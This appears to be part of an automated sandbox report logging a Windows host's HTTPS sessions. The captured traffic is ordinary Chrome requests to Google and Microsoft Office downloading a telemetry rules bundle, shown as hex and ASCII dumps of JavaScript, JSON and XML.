                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                        Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                        Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                        Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                        Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 35 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75
                                                                                                                                                                                                                                                        Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700305,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC925INData Raw: 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69
                                                                                                                                                                                                                                                        Data Ascii: ray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC394INData Raw: 31 38 33 0d 0a 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 52 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 52 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 62 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 66 75
                                                                                                                                                                                                                                                        Data Ascii: 183umber\")return Number.isFinite(a)?a|0:void 0};Sd\u003dfunction(){let a\u003dnull;if(!Rd)return a;try{const b\u003dc\u003d\u003ec;a\u003dRd.createPolicy(\"ogb-qtm#html\",{createHTML:b,createScript:b,createScriptURL:b})}catch(b){}return a};_.Ud\u003dfu
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 38 30 30 30 0d 0a 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 56 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61
                                                                                                                                                                                                                                                        Data Ascii: 8000createScriptURL(a):a)};_.Xd\u003dfunction(a){if(a instanceof _.Vd)return a.i;throw Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC1390INData Raw: 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62
                                                                                                                                                                                                                                                        Data Ascii: tsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.me\u003dfunction(a,b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.549707142.250.185.2284436500C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Version: 697903402
                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:19 GMT
                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                        2024-11-20 23:49:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        4192.168.2.54971913.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:22 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:22 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:22 GMT
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                                                        Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DD08B87243495C"
                                                                                                                                                                                                                                                        x-ms-request-id: b5254561-a01e-0070-0158-3b573b000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234922Z-1777c6cb754lvj6mhC1TEBke940000000abg00000000f5a0
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:22 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                                                                                                                                                                        Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                                                                                                                                                                                        Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                                                                                                                                                                                        Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                                                                                                                                                                                                                        2024-11-20 23:49:23 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                                                                                                                                                                                                                        Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
